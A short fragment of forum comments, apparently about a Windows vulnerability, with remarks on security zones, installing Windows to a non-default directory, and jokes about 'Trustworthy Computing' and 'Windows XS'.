but it doesn't work when I upload the page to the internet...

In other words, what the parent posted runs in the correct security zone, no problem there

Re:This is a major one ,, user interaction not nee

[Tony-A]

Personally I prefer E:\WINNT where D: is the CD-ROM.
It also messes with some stuff you don't really want running.
One more degree of separation ;)

Trustworthy Computing

[Tony-A]

Microsoft Windows XS
( for Xtra Secure ;)